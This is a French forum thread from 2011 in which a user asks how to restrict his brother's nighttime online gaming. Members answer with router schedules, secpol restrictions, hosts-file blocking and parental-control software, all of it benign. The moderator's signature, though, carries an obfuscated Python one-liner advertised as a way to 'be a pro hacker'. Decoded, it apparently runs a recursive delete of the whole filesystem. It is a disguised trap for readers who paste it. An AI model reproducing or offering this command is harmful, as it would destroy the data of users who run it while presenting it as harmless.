Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-07-2011 22:10:17

cedrix
N00b

Bloquer le protocole UDP sur une machine de mon réseau local

Bonjour,

Mon petit frère jour à l'MMORPG runes of magic, et il a énormément du mal à se contrôler, ce qui m'inquiète.

J'aimerai bien bloquer le protocole UDP sur sa machine à partir d'une certaine heure le soir, pour qu'il évite de trop y jouer.

Quelqu’un sait si cela est possible, et  comment je pourrai m'y prendre ?
J'aurai du mal à installer un truc sur son ordinateur. Par contre je peut administrer ma neuf boxe (le seul truc que j'ai trouvé de ce côté, c'est de refusé une adresse MAC, mais ça lui couperait complètement l'accès à internet, et je n'ai pas trouvé comment automatiser ça pour le faire automatiquement à partir d'une certaine heure), et je possède Ubuntu.

Merci d'avance

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-07-2011 14:42:34

spawn
Modérateur

Re : Bloquer le protocole UDP sur une machine de mon réseau local

Bonjour.

Tu es sur que la connexion se fait par UDP (en non UPD, ce qui fait un peu bizarre) ?
Le plus simple n'est il pas de parler à ton frère ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 22-07-2011 15:46:17

M1ck3y
Administrateur
Lieu : Lost in the darkness

J'ai rectifié le titre du sujet cedrix, tu avais écrit UPD au lieu de UDP.

#4 22-07-2011 21:17:16

cedrix
N00b

UDP  (en non UPD, ce qui fait un peu bizarre)

Oui effectivement j'ai inversé les deux dernières lettres.

Tu es sur que la connexion se fait par UDP (en non UPD, ce qui fait un peu bizarre) ?

En fait je pensais que tous les jeux vidéos utilisaient ce protocole, mais peut être que ce n'est pas le cas. Sinon il existe peut être des solutions plus simples ? par exemple uniquement lui donner accès au port d'internet ?

Le plus simple n'est il pas de parler à ton frère ?

En fait j'ai l'intention de lui en parler, et de faire ça avec son accord. Je lui en avait déjà parlé il y a 2 ans, mais ensuite j'ai déménagé à Lille et j'ai pas eu le temps de trouver une solution. En ce moment j'ai plus de temps libre. Le problème c'est qu'il n'arrive pas à ce contrôler. En lui empêchant moi de jouer à certaine heure, il n 'aura pas le choix.
C'est un peu comme un étudiant fumeur qui veut arrêter de fumer, mais qui fument 1 cigarette toutes les heures. Lors d'un examen du bac, s'il n'a pas le choix il pourra se passer de fumer pendant 4 heures lors d'une épreuve. S'il a le paquet sous le main, et la possibilité de fumer, c'est beaucoup plus dur pour lui de se retenir.
C'est pour ça que je préfère faire faire un truc auquel il ne peut pas toucher, et que j'évite les logiciels qui s'installe, facile à désinstaller (en réinstallant windows par exemple)

#5 22-07-2011 21:30:17

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Plop tu peux bloquer une application ou un port sur les paramètres de ta box/routeur en général en y associant une plage horaire.
Après si le frérot est dégourdi un reset une re-config et hop repartit comme en 40.
Le mieux est en effet de lui causer car tout ce que tu pourras faire il pourra passer derrière et le défaire.

Ou alors de lui bloquer l'accès au pc directement d'une manière ou d'une autre.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 23-07-2011 00:10:36

mzutg
Membre Indéboulonnable

Écrit un petit script ( genre batch ) qui quand une certaine heure est atteinte ( tard le soir ), le script ajoute une restriction logicielle dans secpol.msc puis l’enlève quand une seconde heure est atteinte ( la matin ou l'apre-midi). Il faut l'ajouter au démarrage pour qu'il soit actif à tout moment.

Si il s'y connait un peu il peu rentrer dans secpol et supprimer la restriction, ajoute alors une clé dans le registre bloquant l'acces à secpol.msc.

#7 23-07-2011 03:45:51

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Pour fermer le protocole UDP, il faut agir sur la base de registre de Windows au niveau de la clé   HKEY_LOCAL_MACHINE\SYSTEM\ mais Je ne me souviens plus comment procéder, je te laisse chercher de ce coté.

Tu peux avoir accès à la base de registre en tapant: Démarrer -> Exécuter: regedit. Et comme cette opération s'exécute en tant qu'administrateur, alors tu sera le seul à y avoir accès à condition que tu aurais préalablement configurer Windows pour que tu sois l'unique administrateur avec bien entendu un mot de passe.
Mais attention, la base de registre est sensible et la moindre erreur peut avoir des conséquences sur l'ordinateur, donc toujours sauvegarder la base de registre avant toute manipulation.

Sinon moi à ta place je bloque tout simplement l'accès au site en modifiant un fichier système que la machine consulte toujours en premier avant de faire une requête DNS vers le serveur web.

-Tu ouvres un éditeur de texte (bloc-notes) en l’exécutant en tant qu’administrateur et tu te retrouve dans le répertoire (system32), puis tu vas dans (drivers/etc) et tu ouvres le fichier (hosts). Ce n’est pas un fichier texte donc tu indiques tous les fichier (*.*).

-Ensuite tu ajoutes cette ligne juste après l'ipv6:

127.0.0.1	www.site.domaine

Comme dans cet exemple où je bloque l’accès à google:

127.0.0.1       localhost
::1                 localhost
127.0.0.1       www.google.fr

Tu enregistres et c’est tout. Notes qu’il faut un espace de 7 caractères entre l’IP et le site.

Maintenant si tu rentres l’adresse du site dans ton navigateur, l’ordinateur n’enverra pas de requête DNS, et comme pour modifier ce fichier il te faut un accès root, tu es le seul à le faire, du moins pas évident de penser à cette méthode. Pour restaurer le fichier il suffit juste d’effacer ladite ligne wink
Pour information, cette methode est utilisée par certains virus et autres trojan pour modifier des requetes DNS et en particulier les mise à jour des anti-virus.

Dernière modification par Fuji (23-07-2011 08:22:47)

#8 23-07-2011 13:32:52

algerino
Membre d'Or

Bonjour cedrix :

Mon petit frère jour à l'MMORPG runes of magic, et il a énormément du mal à se contrôler, ce qui m'inquiète.

J'aimerai bien bloquer le protocole UDP sur sa machine à partir d'une certaine heure le soir, pour qu'il évite de trop y jouer.

Quelqu’un sait si cela est possible, et  comment je pourrai m'y prendre ?
J'aurai du mal à installer un truc sur son ordinateur. Par contre je peut administrer ma neuf boxe (le seul truc que j'ai trouvé de ce côté, c'est de refusé une adresse MAC, mais ça lui couperait complètement l'accès à internet, et je n'ai pas trouvé comment automatiser ça pour le faire automatiquement à partir d'une certaine heure), et je possède Ubuntu.

C'est de la cyberdependance tongue : je te laisse lire cet article qui doit correspondre à tes besoins Cyberdependance

Tu trouvera sur ce lien un tuto deja prêt : Horraire pc ou sinon sur ce lien : logiciel de contrôle

Voilà si tu as des questions, n'hesite pas wink

Dernière modification par algerino (23-07-2011 13:38:42)

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#9 23-07-2011 14:24:49

mzutg
Membre Indéboulonnable

ah oué il est pas mal ce soft pour les addicts algerino

Annonce